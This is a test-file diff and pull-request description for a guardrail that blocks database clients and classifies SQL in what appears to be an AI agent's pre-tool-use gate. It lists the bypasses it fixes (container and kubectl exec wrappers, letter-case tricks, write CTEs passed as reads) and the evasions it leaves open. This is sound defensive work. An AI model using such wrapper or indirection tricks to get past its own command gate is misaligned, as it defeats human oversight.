+    expect(findBlockingRule("nerdctl exec c1 mongosh", [DB_MANIFEST])?.blockedToken).toBe(
+      "mongosh",
+    );
+  });
+
+  it("blocks docker run <image> psql", () => {
+    const m = findBlockingRule("docker run --rm postgres:16 psql -V", [DB_MANIFEST]);
+    expect(m?.blockedToken).toBe("psql");
+  });
+
+  it("blocks psql after kubectl exec -- separator", () => {
+    const m = findBlockingRule("kubectl exec mypod -c app -- psql -U u", [DB_MANIFEST]);
+    expect(m?.blockedToken).toBe("psql");
+  });
+
+  it("does not block non-db inner commands", () => {
+    expect(findBlockingRule("docker exec mydb ls -la", [DB_MANIFEST])).toBeNull();
+    expect(findBlockingRule("kubectl exec pod -- echo hi", [DB_MANIFEST])).toBeNull();
+  });
+
+  it("unwraps case-insensitive wrapper heads (DOCKER EXEC)", () => {
+    const m = findBlockingRule("DOCKER EXEC mydb psql", [DB_MANIFEST]);
+    expect(m?.blockedToken).toBe("psql");
+  });
+
+  it("still respects the depth cap (no throw on nested wrappers)", () => {
+    const m = findBlockingRule(
+      "docker exec a docker exec b docker exec c docker exec d psql",
+      [DB_MANIFEST],
+    );
+    expect(m === null || m.blockedToken === "psql").toBe(true);
+  });
+});
+
+describe("findBlockingRule — case-insensitive matching", () => {
+  it("blocks uppercase PSQL", () => {
+    expect(findBlockingRule("PSQL -V", [DB_MANIFEST])?.blockedToken).toBe("PSQL");
+  });
+
+  it("blocks mixed-case MySQL and basename /usr/bin/PSQL", () => {
+    expect(findBlockingRule("MySQL -u root", [DB_MANIFEST])?.blockedToken).toBe("MySQL");
+    expect(findBlockingRule("/usr/bin/PSQL -V", [DB_MANIFEST])?.blockedToken).toBe("PSQL");
+  });
+
+  it("blocks two-token 'AWS DynamoDB' case-insensitively", () => {
+    expect(findBlockingRule("AWS DynamoDB list-tables", [DB_MANIFEST])?.blockedToken).toBe(
+      "AWS DynamoDB",
+    );
+  });
+
+  it("preserves original case in blockedToken for the deny message", () => {
+    const match = findBlockingRule("PSQL -V", [DB_MANIFEST])!;
+    expect(defaultDenyMessage(match)).toContain("PSQL");
+  });
+});
+
 describe("findBlockingRule — two-token command match", () => {
   it("blocks 'aws dynamodb …' but not 'aws s3 …'", () => {
     expect(findBlockingRule("aws dynamodb list-tables", [DB_MANIFEST])?.blockedToken).toBe(

--- a/tests/toolkit/guardrail.test.ts
+++ b/tests/toolkit/guardrail.test.ts
@@ -188,6 +188,18 @@ describe("findBlockingRule — container/remote-exec unwrap", () => {
     expect(m?.blockedToken).toBe("mysql");
   });
 
+  it("skips space-form value flags (--network, --detach-keys) to find the inner client", () => {
+    expect(
+      findBlockingRule("docker run --rm --network host postgres psql", [DB_MANIFEST])?.blockedToken,
+    ).toBe("psql");
+    expect(
+      findBlockingRule("docker run --network host img psql", [DB_MANIFEST])?.blockedToken,
+    ).toBe("psql");
+    expect(
+      findBlockingRule("docker exec --detach-keys q mydb psql", [DB_MANIFEST])?.blockedToken,
+    ).toBe("psql");
+  });
+
   it("blocks via podman and nerdctl exec", () => {
     expect(findBlockingRule("podman exec c1 psql", [DB_MANIFEST])?.blockedToken).toBe("psql");
     expect(findBlockingRule("nerdctl exec c1 mongosh", [DB_MANIFEST])?.blockedToken).toBe(


### PR DESCRIPTION
## Summary

Fixes 12 confirmed bugs against v2.4.0 across the SQL policy classifier, the PreToolUse gate engine, the db-client guardrail, db error classification, the Postgres driver, and connector naming. Every behavior-changing fix is opt-in / backward-compatible; defaults are unchanged. Each was implemented with TDD and the security-sensitive ones were adversarially attacked against the built code.

## Fixes

**HIGH**
- **#1 — Postgres array syntax no longer hard-denied.** The SQL statement-splitter rejected any `[` outside a string (to defend SQL-Server bracket-quoted identifiers), denying `SELECT ARRAY[1,2,3]` / `'{1}'::int[]`. Made the bracket guard **dialect-aware**: it still throws for `sqlserver` and the default `generic` posture (defense preserved), and treats `[` as ordinary SQL for postgres/mysql/sqlite/oracle. Dialect is threaded from the configured driver through the classifier; the `/*!` exec-comment defense is unchanged.
- **#2 — Per-rule regex case-insensitivity.** Gate `pattern` rules compiled with no flags, forcing authors to hand-char-class every letter. Added optional `flags` / `ignore_case` (validated `/^[imsu]*$/` — `g`/`y` are rejected, because a reused regex carries `lastIndex` across `.test()` calls and would intermittently fail **open**).
- **#3 — Container/remote-exec unwrap.** `docker exec … psql`, `docker run … psql`, `kubectl exec … -- psql` (and podman/nerdctl) bypassed the db-client blocklist. The guard now unwraps these, skipping the wrapper's flags (incl. space-form value flags like `--network`/`--detach-keys`) to re-scan the inner command, reusing the recursion depth cap.
- **#4 — Data-modifying CTE escalation.** `WITH x AS (DELETE … RETURNING *) SELECT …` classified READ→allow. A leading `WITH` is now scanned (string-masked) and escalated to the strictest contained op, closing the auto-approve bypass. Pure-read CTEs stay READ.

**MEDIUM**
- **#5 — SQL execution errors no longer mislabeled `CONNECTION_ERROR`.** The driver's `SQL_ERROR` was flattened into a message prefix and defaulted to `CONNECTION_ERROR`. Now propagated structurally and mapped to `VALIDATION_ERROR`; `CONNECTION_ERROR` stays reserved for the connect path.
- **#6 — Opt-in numeric coercion.** `bigint_mode` / `numeric_mode` config (default = current string behavior). int8 is coerced only when `Number.isSafeInteger` — values > 2^53 are never lossily converted.
- **#7 — Case-insensitive blocklist match.** `PSQL` (case-insensitive filesystems) bypassed; command-name matching is now case-insensitive, preserving original case in deny messages.
- **#8 — `external_write` host over-match fixed.** An allowlisted host appearing only in a `?key=host` query value or `-d key=host` body no longer reads as the request host (`=` dropped as a host anchor), while a quoted scheme-less host (`'atlassian.net/x'`) still fires.
- **#9 — Typo'd SQL reason.** Unrecognized leading keywords keep the strict ADMIN floor but get an "Unrecognized leading keyword" reason instead of being presented as runnable DDL.
- **#10 — `VALUES` / `TABLE` classified READ** (were ADMIN→present_only).

**LOW**
- **#11 — Opt-in `bytea_encoding`** (`hex`/`base64`) instead of the `{type:'Buffer',data:[...]}` shape (default unchanged).
- **#12 — Migration-safe connector naming.** The hardcoded `wiki_db` env prefix / config + grant paths now resolve: explicit override > legacy (`WIKI_DB_` / `~/.config/wiki_db` when present) > neutral default (`NARAI_DB_` / `~/.config/narai/db`). The grant-path sanitization control is untouched.

## Adversarial verification

The security-sensitive fixes were re-attacked by executing crafted inputs against the built code. The SQL classifier passed clean (78 inputs — bracket defense intact, every data-modifying CTE escalates, no false positives). Two genuine issues were found and fixed in this PR: the container-unwrap was evadable via space-form value flags (`--network`), and the #8 anchor initially over-tightened so a quoted scheme-less host stopped firing. Inherently un-matchable cases (shell-variable/command-substitution indirection, comment-split keywords a DB also can't execute, >3-deep wrapper nesting, exotic uncommon value flags) are documented best-effort limitations, consistent with the guard's posture.

## Testing

- DB-free unit/decision tests for every issue (the live-DB cases are covered by testing the pure helpers and the classifier/gate/guardrail logic directly). Full suite: **2713 passing, 26 skipped (live-DB), 0 failed**. Typecheck clean; clean `tsc` build; plain `npm ci` resolves.

## Compatibility

All opt-in. Without the new config fields, `flags`/`ignore_case` rule fields, or relying on the corrected classifications, behavior matches v2.4.0 — except the four intended hardening/correctness changes (#1 allows Postgres arrays, #4/#3/#7 catch more, #5 relabels SQL errors), each fail-safe.
